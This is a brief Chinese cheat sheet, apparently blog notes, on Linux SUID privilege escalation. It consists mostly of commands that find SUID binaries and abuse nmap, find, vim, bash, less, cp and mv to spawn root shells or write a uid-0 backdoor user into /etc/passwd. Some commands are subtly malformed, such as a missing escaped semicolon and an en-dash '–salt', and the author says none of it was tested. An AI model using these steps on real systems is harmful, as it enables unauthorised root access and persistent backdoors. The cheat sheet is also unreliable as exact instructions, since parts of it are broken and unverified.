# 查找 root suid 并以长格式列出
find / -user root -perm -4000 -exec ls -ldb {} ;
# 查找所有 suid
find / -perm -u=s -type f 2>/dev/null

可利用程序

nmap

要求版本在 2.02-5.21

1
2
3
4
nmap --interactive
!sh
whoami
# root
find

find 可以执行命令;

1
2
3
touch middle
find middle -exec whoami ;
# root
vim/vi
1
openssl passwd -1 –salt abc 123456

这会生成一个散列值,可以利用 suid vim 在 /etc/passwd 中添加如下行:

1
hack:$1$abc$hash:0:0:root:/hack:/bin/bash

就成功添加了一个 root 用户可以用;

还有一种直接拿 shell:

1
2
3
4
vim.tiny
# Press ESC key
set shell=/bin/sh
shell
bash
1
2
3
bash -p
whoami
# root
less/more
1
2
less /etc/passwd
!/bin/sh
python/perl/ruby/lua/php/etc

root 身份写各自语言的代码执行;

cp

覆盖 /etc/passwd ,和 vim 相同;

mv

覆盖 /etc/passwd ,和 vim 相同;

后记

suid 没有做复现,这两天过于忙,有时间补充;